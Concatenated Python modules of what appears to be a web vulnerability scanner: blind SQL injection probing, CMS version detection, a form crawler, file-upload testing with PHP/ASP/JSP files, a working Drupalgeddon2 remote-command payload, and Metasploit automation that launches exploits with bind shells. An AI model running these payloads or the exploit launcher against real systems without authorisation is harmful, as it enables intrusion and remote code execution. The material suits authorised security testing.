            result = self.inject(base, param_data, data, parameter_get=param, parameter_post=None)
            if result:
                response, match = result
                results.append({'request': requests_response_to_dict(response), "match": match})

        for param in data:
            result = self.inject(base, param_data, data, parameter_get=None, parameter_post=param)
            if result:
                response, match = result
                results.append({'request': requests_response_to_dict(response), "match": match})
        return results

    def send(self, url, params, data=None):
        result = None
        headers = self.headers
        cookies = self.cookies
        try:
            if data:
                result = requests.post(url, params=params, data=data, headers=headers, cookies=cookies)
            else:
                result = requests.get(url, params=params, headers=headers, cookies=cookies)

        except Exception:
            return False
        return result

    def getlen(self, response):
        if not response:
            return 0
        if self.can_use_content_length:
            for header in response.headers:
                if header.lower() == 'content-length':
                    return int(response.headers[header])
            self.can_use_content_length = False
        return len(response.text)

    def inject(self, url, params, data=None, parameter_get=None, parameter_post=None):
        if parameter_get:
            tmp = dict(params)
            ogvalue = tmp[parameter_get]

            get_firstpage = self.send(url, tmp, data)
            firstpage_len = self.getlen(get_firstpage)

            get_firstpage_two = self.send(url, tmp, data)
            second_page = self.getlen(get_firstpage_two)
            if second_page != firstpage_len:
                # cannot check with random page length (dynamic content)
                return False
            rstring = random_string()
            tmp[parameter_get] = rstring
            check_reflection = self.send(url, params=tmp, data=data)
            if rstring in check_reflection.text:
                # query values are reflected, cannot test using only page length
                return False
            tmp[parameter_get] = ogvalue

            for injection in self.possibilities:
                injection_query = self.possibilities[injection]

                random_true = random.randint(9999, 999999)
                random_false = random_true + 1

                query_true = "%d=%d" % (random_true, random_true)
                query_false = "%d=%d" % (random_true, random_false)

                injection_query_true = injection_query.replace('{original_value}', ogvalue)
                injection_query_true = injection_query_true.replace('{query}', query_true)

                tmp[parameter_get] = injection_query_true
                page_data = self.send(url, params=tmp, data=data)

                datalen_true = self.getlen(page_data)

                if True:
                    # might be vulnerable because query caused original state
                    injection_query_false = injection_query.replace('{original_value}', ogvalue)
                    injection_query_false = injection_query_false.replace('{query}', query_false)

                    tmp[parameter_get] = injection_query_false
                    get_data = self.send(url, params=tmp, data=data)
                    datalen = self.getlen(get_data)
                    if get_data and datalen != datalen_true:
                        return (get_data, {"injection": injection.upper(),
                                "parameter": parameter_get,
                                "location": "url",
                                "query_true": injection_query_true,
                                "query_false": injection_query_false,
                                "states": {
                                    "true_length": datalen_true,
                                    "false_length": datalen
                                }})

        if parameter_post:
            tmp = dict(data)
            ogvalue = tmp[parameter_post]

            get_firstpage = self.send(url, params, tmp)
            firstpage_len = self.getlen(get_firstpage)

            get_firstpage_two = self.send(url, params, tmp)
            second_page = self.getlen(get_firstpage_two)
            if second_page != firstpage_len:
                # cannot check with random page length (dynamic content)
                return False

            rstring = random_string()
            tmp[parameter_post] = rstring
            check_reflection = self.send(url, params=params, data=tmp)
            if rstring in check_reflection.text:
                # query values are reflected, cannot test using only page length
                return False
            tmp[parameter_post] = ogvalue

            for injection in self.possibilities:
                injection_query = self.possibilities[injection]

                random_true = random.randint(9999, 999999)
                random_false = random_true + 1

                query_true = "%d=%d" % (random_true, random_true)
                query_false = "%d=%d" % (random_true, random_false)

                injection_query_true = injection_query.replace('{original_value}', ogvalue)
                injection_query_true = injection_query_true.replace('{query}', query_true)

                tmp[parameter_post] = injection_query_true
                page_data = self.send(url, params=params, data=tmp)
                if str(random_true) in page_data.text:
                    # query values are reflected, cannot test using only page length
                    continue

                datalen_true = self.getlen(page_data)

                if True:
                    # might be vulnerable because query caused original state
                    injection_query_false = injection_query.replace('{original_value}', ogvalue)
                    injection_query_false = injection_query_false.replace('{query}', query_false)

                    tmp[parameter_post] = injection_query_false
                    get_postdata = self.send(url, params=data, data=tmp)
                    datalen = self.getlen(get_postdata)
                    if get_postdata and datalen != datalen_true:
                        return (get_postdata, {"injection": injection.upper(),
                                               "parameter": parameter_post,
                                               "location": "url",
                                               "query_true": injection_query_true,
                                               "query_false": injection_query_false,
                                               "states": {
                                                   "true_length": datalen_true,
                                                   "false_length": datalen
                                               }})
        return None



from helios.webapp import base_app
import re
import json

try:
    from urlparse import urljoin
except ImportError:
    from urllib.parse import urljoin


# This script detects vulnerabilities in the following PHP based products:
# - Textpattern
class Scanner(base_app.BaseAPP):

    def __init__(self):
        self.name = "Textpattern"
        self.types = []

    def detect(self, url):
        directories = ['', 'blog', 'textpattern']
        for d in directories:
            path = urljoin(url, d)
            response = self.send(path)
            if response and response.status_code == 200 and \
                    ("Textpattern" in response.text or '<body class="front-page"' in response.text):
                self.app_url = path
                return True
        return False

    def test(self, url):
        cl_url = urljoin(url, "README.txt")
        cl_data = self.send(cl_url)
        version = None
        if cl_data:
            get_version = re.search(r'Textpattern CMS ([\d\.]+)', cl_data.text)
            if get_version:
                version = get_version.group(1)
                self.logger.info("%s version %s was identified from the README.txt file" % (self.name, version))

        if version:
            db = self.get_db("textpattern_vulns.json")
            data = json.loads(db)
            subrion_vulns = data['Textpattern']
            self.match_versions(subrion_vulns, version, url)



import time
import requests
import os
import logging
import sys

class Scanner:
    # set frequency for update call
    update_frequency = 0
    name = ""
    aggressive = False
    last_update = 0
    cache_dir = os.path.join(os.path.dirname(__file__), 'cache')
    logger = None
    updates = {}
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"}
    cookies = {}

    def get_version(self, url):
        return None

    def set_logger(self, log_level=logging.DEBUG):
        self.logger = logging.getLogger("CMS-%s" % self.name)
        self.logger.setLevel(log_level)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(log_level)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if not self.logger.handlers:
            self.logger.addHandler(ch)

    def update(self):
        pass
    
    def run(self, url):
        return {}

    def get_update_cache(self):
        if os.path.exists(self.cache_file('updates.txt')):
            self.logger.debug("Reading update cache")
            with open(self.cache_file('updates.txt'), 'r') as f:
                for x in f.read().strip().split('\n'):
                    if len(x):
                        scanner, last_update = x.split(':')
                        self.updates[scanner] = int(last_update)
                    else:
                        self.logger.warning("There appears to be an error in the updates cache file")
                        self.updates[self.name] = 0
            if self.name in self.updates:
                self.last_update = self.updates[self.name]
            else:
                self.updates[self.name] = time.time()
        else:
            self.logger.debug("No updates cache file found, creating empty one")
            self.updates[self.name] = time.time()

    def set_update_cache(self):
        self.logger.debug("Updating updates cache file")
        with open(self.cache_file('updates.txt'), 'w') as f:
            for x in self.updates:
                f.write("%s:%d\n" % (x, self.updates[x]))

    def cache_file(self, r):
        return os.path.join(self.cache_dir, r)

    def setup(self):
        if not os.path.exists(self.cache_dir):
            self.logger.info("Creating cache directory")
            os.mkdir(self.cache_dir)
        self.get_update_cache()
        if self.last_update + self.update_frequency < time.time():
            self.last_update = time.time()
            self.updates[self.name] = time.time()
            self.update()
            self.set_update_cache()
        else:
            self.logger.debug("Database is up to date, skipping..")

    def match_versions(self, version, fixed_in):
        if version == fixed_in:
            return False
        parts_version = version.split('.')
        parts_fixed_in = fixed_in.split('.')

        if len(parts_version) <= len(parts_fixed_in):
            for x in range(len(parts_version)):
                if int(parts_version[x]) < int(parts_fixed_in[x]):
                    return True
                if int(parts_version[x]) > int(parts_fixed_in[x]):
                    return False
            return False

        else:
            for x in range(len(parts_fixed_in)):
                if int(parts_version[x]) < int(parts_fixed_in[x]):
                    return True
                if int(parts_version[x]) > int(parts_fixed_in[x]):
                    return False
            return False

    def get(self, url, data=None):
        if not data:
            result = requests.get(url, allow_redirects=False, headers=self.headers, cookies=self.cookies)
            return result
        else:
            result = requests.post(url, data=data, allow_redirects=False, headers=self.headers, cookies=self.cookies)
            return result



import requests
from helios.core import response


class Request:
    url = ""
    data = None
    headers = None
    cookies = None
    redirect = False
    is_done = False
    is_ok = False
    response = None
    request_headers = {}

    def __init__(self, url, data=None, headers=None, cookies=None, redir=True, agent=None):
        self.url = url
        self.data = data
        self.headers = headers
        if agent:
            if not self.headers:
                self.headers = {}
            self.headers['User-Agent'] = agent
        self.cookies = cookies
        self.redirect = redir

    def run(self):
        result = None
        if self.data:
            try:
                result = requests.post(self.url,
                                       data=self.data,
                                       headers=self.headers,
                                       cookies=self.cookies,
                                       allow_redirects=self.redirect,
                                       verify=False)
            except:
                result = -1
        else:
            try:
                result = requests.get(self.url,
                                      headers=self.headers,
                                      cookies=self.cookies,
                                      allow_redirects=self.redirect,
                                      verify=False)
            except:
                result = -1
        if result == -1:
            self.is_done = True
            self.is_ok = False
            return
        self.request_headers = result.request.headers
        self.is_done = True
        if result:
            r = response.Raw(
                text=result.text,
                code=result.status_code,
                cookies=result.cookies,
                headers=result.headers,
                final_url=result.url,
                ctype=result.headers.get('content-type'),
                object=self
            )
            self.response = r
            self.is_ok = True




import time
import socket
import os
import helios.ext

try:
    from urlparse import urlparse
    from Queue import Queue, Empty
except ImportError:
    from urllib.parse import urlparse
    from queue import Queue, Empty


class MetaMonster:
    client = None
    host = "127.0.0.1"
    port = 55553
    ssl = True
    endpoint = "/api/"
    username = "msf"
    password = "msf"
    modules = []
    aggressive = True
    should_start = True
    log_level = None
    results = {
        'working': [],
        'launched': [],
        'parameters': {}
    }

    os_types = [
        'windows',
        'unix',
        'linux',
        'bsd',
        'multi'
    ]

    exploit_types = [
        'http',
        'webapp'
    ]

    external = {}

    def __init__(self, log_level):
        self.log_level = log_level

    def connect(self, server):
        url = "http%s://%s:%d%s" % ('s' if self.ssl else '', self.host, self.port, self.endpoint)
        self.client = Client(url, username=self.username, password=self.password, log_level=self.log_level)
        self.client.logger.info("Using %s as metasploit endpoint" % url)
        self.client.ssl = self.ssl
        if not self.client.auth():
            self.client.logger.warning("Cannot start MetaMonster, msfrpcd auth was not successful")
            if self.should_start:
                self.client.logger.warning("Attempting to start msfrpcd")
                command = "msfrpcd -U %s -P %s -a %s -p %d %s" % (
                self.username, self.password, self.host, self.port, "-S" if not self.ssl else "")
                command = command.strip()
                os.system(command)
                time.sleep(10)
                self.client = Client(url, username=self.username, password=self.password)
                if not self.client.auth():
                    self.client = None
            self.client = None
        u = urlparse(server)
        self.external['url'] = server
        self.external['host'] = u.netloc
        self.external['method'] = u.scheme
        self.external['ip'] = None
        self.external['port'] = u.port if u.port else 80 if server.startswith('http:') else 443
        self.external['os'] = None
        self.external['tech'] = []

        self.msf = {
            "settings": {
                "shell_type": "bind_tcp",
                "shell_type_fallback": "bind_",
                "shell_port_start": 49200,
                "shell_port_end": 50000,
                "min_success": ["excellent", "good", "average"],
                "allow_dos": False,
                "gather_basic_info": False,
                "drop_after_successful": True,
                "ignore_SRVHOST": True,
                "ignore_privileged": True
            },
            "parameters": {

            }
        }

    def get_exploits(self):
        if self.client and self.client.is_working:
            data = self.client.request("module.exploits")
            for x in data[b'modules']:
                self.modules.append(x.decode())
            self.client.logger.info("Loaded %d modules for searching" % len(self.modules))

    def get_parameters(self):
        params = {}
        params['VHOST'] = self.external['host']
        params['RHOST'] = self.external['ip']
        params['RHOSTS'] = self.external['ip']
        params['RPORT'] = self.external['port']
        params['SSL'] = True if self.external['method'] == "https" else False
        self.msf['parameters'] = params

    def resolve(self, hostname):
        try:
            ip = socket.gethostbyname(hostname)
            self.external['ip'] = ip
            self.client.logger.debug("%s resolves to %s" % (hostname, ip))
        except:
            self.client.logger.error("Error resolving host %s" % hostname)
            pass

    def search(self, arch_type='', subtype='http', keyword=''):
        exploits = []
        for m in self.modules:
            parts = m.split('/')
            try:
                arch, exp_type, name = parts if len(parts) == 3 else [None].extend(parts)
                if arch == arch_type and exp_type == subtype and keyword in m:
                    exploits.append(m)
            except:
                pass
        return exploits

    def detect(self):
        self.resolve(self.external['host'])
        p = PassiveDetector(self.external['url'])
        result = p.get_page()
        if result:
            os, tech = p.detect(result)
            self.external['os'] = os
            self.external['tech'] = tech

    def key_db(self, keywords):
        if "wordpress" in keywords:
            keywords.append('wp_')
        if "drupal" in keywords:
            keywords.append('drupa')
        if "iis" in keywords:
            keywords.append('asp')
        return keywords

    def run_queries(self, queries):
        exploits = []
        self.client.logger.info("Setting parameters")
        self.get_parameters()
        self.client.logger.info("Preparing exploits")
        for query in queries:
            os, sub, keyword = query
            dataresults = self.search(os, sub, keyword)
            for exploit in dataresults:
                if exploit not in exploits:
                    exploits.append(exploit)
                    self.client.logger.debug("Added exploit %s to the queue. query: %s" % (exploit, ','.join(query)))
        self.client.logger.info("Running %d exploits" % len(exploits))
        executor = MetaExecutor(self, exploits)
        working_exploits = executor.start()

        for working in working_exploits:
            self.results['working'].append(working)

        self.results['launched'] = exploits

        self.results['parameters'] = self.msf['parameters']

    def create_queries(self):
        self.client.logger.debug("Starting query creation")
        os_versions = []
        output = []

        if not self.external['os']:
            os_versions = self.os_types
            self.client.logger.debug("Could not guess OS type, using all available: %s" % ', '.join(os_versions))
        elif self.external['os'] == "linux":
            os_versions = ['linux', 'unix', 'multi']
        elif self.external['os'] == "unix":
            os_versions = ['linux', 'unix', 'multi']
        elif self.external['os'] == "windows":
            os_versions = ['windows', 'multi']
        self.client.logger.info("Using operating systems for search query: %s" % ', '.join(os_versions))
        tech = self.external['tech']
        new_list = self.key_db(tech)
        for i in new_list:
            if i not in tech:
                tech.append(i)

        for keyword in tech:
            for search_type in self.exploit_types:
                for os_version in os_versions:
                    output.append(
                        [os_version, search_type, keyword]
                    )
        return output



import sys
import os
# extend the path with the current file, allows the use of other CMS scripts
sys.path.insert(0, os.path.dirname(__file__))
import cms_scanner
import re
import json
import random

try:
    from urlparse import urljoin, urlparse
except ImportError:
    from urllib.parse import urljoin, urlparse


class Scanner(cms_scanner.Scanner):
    def __init__(self):
        self.name = "drupal"
        self.update_frequency = 3600 * 48

    def get_version(self, url):
        text = self.get(urljoin(url, "CHANGELOG.txt"))
        if text:
            version_check_1 = re.search('Drupal (\d+\.\d+)', text.text)
            if version_check_1:
                self.logger.info(
                    "Detected %s version %s on %s trough changelog file" % (self.name, version_check_1.group(1), url))
                return version_check_1.group(1)
        text = self.get(url)
        if text:
            version_check_2 = re.search('<meta name="generator" content="Drupal (\d+)', text.text)
            if version_check_2:
                self.logger.info(
                    "Detected %s version %s on %s trough generator tag" % (self.name, version_check_2.group(1), url))
                return version_check_2.group(1)
        self.logger.warning("Unable to determine CMS version on url %s" % url)
        return None

    def test(self, url):
        checks = []
        rand = random.randint(10000, 99999)
        dupa = urljoin(url, "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax")
        payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
                   'mail[#type]': 'markup', 'mail[#markup]': 'echo "%d" | tee output.txt' % rand}
        result = self.get(dupa, data=payload)

        check = self.get(urljoin(url, "output.txt"))
        if check and check.code == 200 and rand in check.text:
            self.logger.warning("CMS %s appears to be vulnerable to Drupalgeddon2 CVE-2018-7600" % self.name)
            checks.append({'check': 'Drupalgeddon2: CVE-2018-7600', 'vuln': True, 'info': 'Random string was written to file'})
            payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
                       'mail[#type]': 'markup', 'mail[#markup]': 'rm output.txt'}
            self.logger.info("Cleaning up exploit data on remote host")
            self.get(dupa, data=payload)
        else:
            checks.append({'check': 'CVE-2018-7600', 'vuln': False, 'info': 'Command was not executed'})
        return checks

    def run(self, base):
        self.set_logger()
        self.setup()

        version = self.get_version(base)

        checks = self.test(base)

        return {
            'version': version,
            'checks': checks
        }






import re
import requests
from helios.core.utils import aspx_strip_internal, params_from_str
import json
import random
import string
import hashlib
import logging
from bs4 import BeautifulSoup
try:
    import urlparse
except ImportError:
    import urllib.parse as urlparse

# WIP and very unstable


class Event:
    url = ""
    state_url = ""
    inputs = {}
    actions = []
    session = None
    random_text_size = 8
    user_email = None
    user_password = None

    def __init__(self, session):
        self.session = session
        if not self.session:
            self.session = requests.session()

    def run_actions(self):
        results = []
        for a in self.actions:
            result = self.run_action(a)
            if result:
                results.append([a, result])
        return results

    def run_action(self, action):
        tmp = dict(self.inputs)
        target, argument = action
        internal = aspx_strip_internal(tmp)
        tmp['__EVENTTARGET'] = target
        tmp['__EVENTARGUMENT'] = argument
        print("Submitting action %s:%s" % (target, argument))
        try:
            print("[POST] %s %s" % (self.url, json.dumps(internal)))
            result = self.session.post(self.url, tmp)
            if result:
                print("[%d] %s len:%d type:%s" % (result.status_code, result.url, len(result.text), result.headers['content-type'] if 'content-type' in result.headers else 'Unknown'))
                return result
            return None
        except requests.Timeout:
            print("POST %s resulted in timeout" % self.url)
        except Exception as e:
            print("POST %s caused an exception: %s" % (self.url, str(e)))
        return False

    def generate_random(self, input_type, name):
        name = name.lower()
        # in some cases this allows the crawler to successfully register + login
        if not input_type:
            return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size))
        if input_type == "email" or "mail" in name:
            if not self.user_email:
                self.user_email = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size)) + '@' + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size)) + '.com'
            return self.user_email
        if input_type == "password" or "password" in name:
            if not self.user_password:
                self.user_password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size))
            return self.user_password

        if input_type in ['number', 'integer', 'decimal']:
            return 1
        return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size))


# class with some static methods
class FormDataToolkit:
    def __init__(self):
        pass

    @staticmethod
    def get_checksum(data):
        keys = []
        for x in data:
            keys.append(x)
        return hashlib.md5(''.join(keys).encode('utf-8')).hexdigest()

    @staticmethod
    def get_full_checksum(data):
        keys = []
        for x in data:
            keys.append("{0}={1}".format(x, data[x]))
        return hashlib.md5('&'.join(keys).encode('utf-8')).hexdigest()


class Crawler:
    form_re = re.compile(r'(?s)(<form.+?</form>)', re.IGNORECASE)
    form_action_re = re.compile(r'<form.+?action=[\'"](.*?)[\'"]', re.IGNORECASE)
    hidden_re = re.compile(r'<input(.+?)(?:/)?>', re.IGNORECASE)
    name_re = re.compile(r'name=[\'"](.+?)[\'"]', re.IGNORECASE)
    type_re = re.compile(r'type=[\'"](.+?)[\'"]', re.IGNORECASE)
    value_re = re.compile(r'value=[\'"](.+?)[\'"]', re.IGNORECASE)
    other_types = [
        re.compile(r'(?s)<(select).+?name=[\'"](.+?)[\'"].+?value=[\'"](.*?)[\'"]', re.IGNORECASE),
        re.compile(r'(?s)<(textarea).+?name=[\'"](.+?)[\'"].+?>(.*?)</textarea>', re.IGNORECASE)
    ]
    postback_re = re.compile(r'__doPostBack\(.*?[\'"](.+?)[\'"\\]\s*,\s*[\'"](.*?)[\'"\\]', re.IGNORECASE)
    page_re = [
        re.compile(r'window\.location\s*=\s*[\'"](.+?)[\'"]'),
        re.compile(r'document\.location\s*=\s*[\'"](.+?)[\'"]'),
        re.compile(r'document\.location\.href\s*=\s*[\'"](.+?)[\'"]'),
        re.compile(r'window\.location\.replace\([\'"](.+?)[\'"]'),
        re.compile(r'http-equiv="refresh.+?URL=[\'"](.+?)[\'"]')
    ]
    todo = []
    seen = []
    logger = logging.getLogger("State Crawler")
    max_allowed_checksum = 5

    max_urls = 200
    max_url_unique_keys = 1
    url_variations = []
    ignored = []

    max_postdata_per_url = 10
    max_postdata_unique_keys = 5
    blocked_filetypes = ['.jpg', '.png', '.gif', '.wav', '.mp3', '.mp4', '.3gp', '.js', '.css', 'jpeg', '.pdf', '.ico']
    scope = None

    def __init__(self):
        self.session = requests.session()

    def run(self, url):
        html = self.session.get(url)
        x = self.get_inputs(url, html.text)
        for event in x:
           self.todo.append(event)

        while len(self.todo):
            entry = self.todo.pop(0)
            self.seen.append(entry)
            results = entry.run_actions()
            for result in results:
                result_event, result = result
                x = self.get_inputs(result.url, result.text)
                for event in x:
                    if not self.has_seen_action(event.url, event.inputs):
                        self.todo.append(event)

    def get_filetype(self, url):
        url = url.split('?')[0]
        loc = urlparse.urlparse(url).path.split('.')
        if len(loc) is 1:
            return None
        return ".{0}".format(loc[len(loc)-1].lower())

    def parse_url(self, url, rooturl):
        url = url.split('#')[0]
        url = url.strip()
        if url in self.ignored:
            return
        if self.get_filetype(url) in self.blocked_filetypes:
            self.ignored.append(url)
            self.logger.debug("Url %s will be ignored because file type is not allowed" % url)
            return
        if "?" in url:
            params = params_from_str(url.split('?')[1])
            checksum = FormDataToolkit.get_checksum(params)
            if [url, checksum] in self.url_variations:
                var_num = 0
                for part in self.url_variations:
                    if part == [url, checksum]:
                        var_num += 1
                if var_num >= self.max_url_unique_keys:
                    self.ignored.append(url)
                    self.logger.debug("Url %s will be ignored because key variation limit is exceeded" % url)
                    return
                self.url_variations.append([url, checksum])

        # if local link or link on same site root
        if url.startswith('/') or url.startswith(self.root_url):
            url = urlparse.urljoin(rooturl, url)
            if [url, None] not in self.scraped_pages:
                self.to_crawl.put([url, None])
        # javascript, raw data, mailto etc..
        if not url.startswith('javascript:') or url.startswith('data:') or url.startswith('mailto:'):
            url = urlparse.urljoin(rooturl, url)
            if not self.scope.in_scope(url):
                self.ignored.append(url)
                self.logger.debug("Url %s will be ignored because out of scope" % url)
                return
            if [url, None] not in self.scraped_pages:
                self.to_crawl.put([url, None])

    def parse_links(self, html, rooturl):
        try:
            soup = BeautifulSoup(html, 'html.parser')
            links = soup.find_all('a', href=True)
            for link in links:
                if (len(self.todo) + len(self.seen)) > self.max_urls:
                    continue
                url = link['href']
                self.parse_url(url, rooturl)
            for regex in self.page_re:
                results = regex.findall(html)
                for res in results:
                    self.parse_url(res, rooturl)

        except Exception as e:
            self.logger.warning("Parse error on %s -> %s" % (rooturl, str(e)))

    def has_seen_action(self, url, data):
        for handler in self.seen:
            if handler.url == url:
                checksum = FormDataToolkit.get_checksum(data)
                handler_checksum = FormDataToolkit.get_checksum(handler.inputs)
                if checksum == handler_checksum:
                    return True
        for handler in self.todo:
            if handler.url == url:
                checksum = FormDataToolkit.get_checksum(data)
                handler_checksum = FormDataToolkit.get_checksum(handler.inputs)
                if checksum == handler_checksum:
                    return True
        return False

    def get_inputs(self, url, html):
        data = []
        html = html.replace('&#39;', "'")
        html = html.replace('&amp;', "&")
        for form in self.form_re.findall(html):
            post_url = url
            get_action = self.form_action_re.search(form)
            if get_action:
                post_url = urlparse.urljoin(url, get_action.group(1))
            handler = Event(self.session)
            handler.url = post_url
            handler.state_url = url
            for inp in self.hidden_re.findall(form):
                name = self.name_re.search(inp)
                if not name:
                    continue
                name = name.group(1)
                input_type = self.type_re.search(inp)
                if not input_type:
                    continue
                input_type = input_type.group(1)
                value = self.value_re.search(inp)
                value = value.group(1) if value else handler.generate_random(input_type, name)
                handler.inputs[name] = value
            for match in self.other_types:
                results = match.findall(form)
                for entry in results:
                    handler.inputs[entry[1]] = entry[2]
            for postback in self.postback_re.findall(form):
                if postback not in handler.actions:
                    handler.actions.append(postback)
            data.append(handler)
        return data



import sys
import os
# extend the path with the current file, allows the use of other CMS scripts
sys.path.insert(0, os.path.dirname(__file__))
import cms_scanner
import re
import json
try:
    from urlparse import urljoin, urlparse
except ImportError:
    from urllib.parse import urljoin, urlparse


class Scanner(cms_scanner.Scanner):
    def __init__(self):
        self.name = "joomla"
        self.update_frequency = 3600 * 48

    def get_version(self, url):
        text = self.get(urljoin(url, "language/en-GB/en-GB.xml"))
        if text:
            version_check_1 = re.search('<version>(.+?)</version>', text.text)
            if version_check_1:
                self.logger.info(
                    "Detected %s version %s on %s trough language file" % (self.name, version_check_1.group(1), url))
                return version_check_1.group(1)
        text = self.get(urljoin(url, "administrator/manifests/files/joomla.xml"))
        if text:
            version_check_2 = re.search('<version>(.+?)</version>', text.text)
            if version_check_2:
                self.logger.info(
                    "Detected %s version %s on %s trough admin xml" % (self.name, version_check_2.group(1), url))
                return version_check_2.group(1)
        text = self.get(urljoin(url, 'plugins/editors/tinymce/tinymce.xml'))
        if text:
            version_check_3 = re.search('<version>(.+?)</version>', text.text)
            if version_check_3:
                sub = version_check_2.group(1)
                # removed lowest versions to prevent false positives
                sub_versions = {
                    '3.5.6': '3.1.6',
                    '4.0.10': '3.2.1',
                    '4.0.12': '3.2.2',
                    '4.0.18': '3.2.4',
                    '4.0.22': '3.3.0',
                    '4.0.28': '3.3.6',
                    '4.1.7': '3.4.0',
                }
                self.logger.info("Could not determine version but TinyMCE is present, " +
                                 "detection will probably not be very accurate")
                if sub in sub_versions:
                    return sub_versions[sub]
        self.logger.warning("Unable to determine CMS version on url %s" % url)
        return None

    def run(self, base):
        self.set_logger()
        self.setup()

        version = self.get_version(base)
        self.logger.info("Because Joomla compononents are too wide-spread"
                         " the default scanner should detect most vulnerabilities")
        return {
            'version': version,
            'plugins': [],
            'plugin_vulns': [],
            'version_vulns': [],
            'discovery': []
        }






import re
import requests
try:
    import urlparse
except ImportError:
    import urllib.parse as urlparse
import helios.modules.module_base
from helios.core.utils import requests_response_to_dict, random_string
from bs4 import BeautifulSoup


class Module(helios.modules.module_base.Base):

    def __init__(self):
        self.name = "File Uploads"
        self.input = "urls"
        self.injections = {}
        self.module_types = ['discovery']
        self.output = "vulns"
        self.severity = 2
        self.needle = None

    def run(self, urls, headers={}, cookies={}):
        results = []
        self.cookies = cookies
        self.headers = headers
        list_urls = []
        for u in urls:
            if u[0].split('?')[0] not in list_urls:
                list_urls.append(u[0].split('?')[0])

        for f in list_urls:
            working = 0
            result_fp = self.send(f, self.headers, self.cookies)
            if result_fp and self.scope.in_scope(result_fp.url):
                for upl_form in re.findall(r'(?s)(<form.+?multipart/form-data".+?</form>)', result_fp.text):
                    try:
                        post_body = {}
                        soup = BeautifulSoup(upl_form, "lxml")
                        f = soup.find('form')
                        # if form has no action use current url instead
                        action = urlparse.urljoin(result_fp.url, f['action']) if f.has_attr('action') else result_fp.url
                        for frm_input in f.findAll('input'):
                            if frm_input.has_attr('name') and frm_input.has_attr('type'):
                                if frm_input['type'] == "file":
                                    post_body[frm_input['name']] = "{file}"
                                else:
                                    post_body[frm_input['name']] = frm_input['value'] \
                                        if frm_input.has_attr('value') else random_string(8)
                        output, boundry = self.get_multipart_form_data(result_fp.url, post_body)

                        self.headers['Content-Type'] = 'multipart/form-data; boundary=%s' % boundry
                        send_post = self.send(action, params=None, data=output)
                        if send_post and send_post.status_code == 200:
                            result = self.find_needle(action)
                            if result:
                                results.append({'request': requests_response_to_dict(send_post),
                                                "match": "File was successfully uploaded to %s" % result})
                    except:
                        pass

        return results

    def find_needle(self, url):
        if 'Content-Type' in self.headers:
            del self.headers['Content-Type']
        filename, match, contents = self.needle
        common_dirs = ['uploads', 'upload', 'files', 'data', 'images', 'img', 'assets', 'cache']
        root = urlparse.urljoin(url, '/')
        upath = '/'.join(url.split('/')[:-1]) + "/"
        for d in common_dirs:
            if root == url:
                break
            rpath = "%s%s/%s" % (root, d, filename)
            get = self.send(rpath, None, None)
            if get and get.status_code == 200 and match in get.text:
                return rpath
        for d in common_dirs:
            if upath == root:
                continue
            rpath = "%s%d/%s" % (upath, d, filename)
            get = self.send(rpath, None, None)
            if get and get.status_code == 200 and match in get.text:
                return rpath

    def get_multipart_form_data(self, url, post_data):
        output = ""
        boundry = "----WebKitFormBoundary%s" % random_string(15)
        output += "--" + boundry + "\r\n"
        for name in post_data:
            value = post_data[name]
            opt = ''

            if value == "{file}":
                outf = self.generate_file(url)
                self.needle = outf
                filename, match, contents = outf
                name = name + '"; filename="%s' % filename
                value = contents
                opt = 'Content-Type: \r\n'

            header = 'Content-Disposition: form-data; name="%s"\r\n' % name
            header += opt
            header += "\r\n"

            outstr = "%s%s\r\n" % (header,  value)
            output += outstr
            output += "--" + boundry + "\r\n"
        output = output[:-2] + "--"
        return output, boundry.strip()

    def generate_file(self, url):
        filename = "upload.txt"
        match = random_string(8)
        contents = match
        if ".php" in url:
            filename = random_string(8) + ".php"
            match = random_string(8)
            contents = "<?php echo '%s'; ?>" % match

        if ".asp" in url:
            # also catches aspx
            filename = random_string(8) + ".asp"
            match = random_string(8)
            contents = '<%% Response.Write("%s") %%>' % match

        if ".jsp" in url:
            filename = random_string(8) + ".jsp"
            match = random_string(8)
            contents = '<%% out.print("%s"); %%>' % match

        return filename, match, contents

    def send(self, url, params, data):
        result = None
        headers = self.headers
        cookies = self.cookies
        try:
            if data:
                result = requests.post(url, params=params, data=data,
                                       headers=headers, cookies=cookies, verify=self.verify)
            else:
                result = requests.get(url, params=params,
                                      headers=headers, cookies=cookies, verify=self.verify)
        except Exception as e:
            pass
        return result



from base64 import b64encode
import re
import sys
import logging
import requests
try:
    from urllib import parse
except ImportError:
    import urlparse as parse


class LoginAction:
    session_obj = None
    headers = {}
    cookies = {}
    logger = None

    def __init__(self, logger=logging.INFO):
        self.session_obj = requests.session()
        self.logger = logging.getLogger("Login")
        self.logger.setLevel(logger)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logger)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        self.logger.addHandler(ch)

    def basic_auth(self, up_str):
        value = b64encode(up_str.encode()).decode()
        header = "Basic %s" % value
        self.logger.info("Using header Authorization: %s" % header)
        self.headers['Authorization'] = header

    def login_form(self, url, data, headers={}):
        try:
            data = dict(parse.parse_qsl(data))
        except Exception as e:
            self.logger.error("Login Error: login payload should be in urlencoded format: %s" % str(e))
            return None

        for k in headers:
            self.headers[k] = headers[k]
        self.session_obj.get(url)
        self.logger.debug("Login payload: %s" % str(data))
        return self.session_obj.post(url, data=data, headers=self.headers, allow_redirects=False)

    def login_form_csrf(self, url, data, headers={}, token_url=None):
        try:
            data = dict(parse.parse_qsl(data))
        except Exception as e:
            self.logger.error("Login Error: login payload should be in urlencoded format: %s" % str(e))
            return None
        if not token_url:
            token_url = url

        for k in headers:
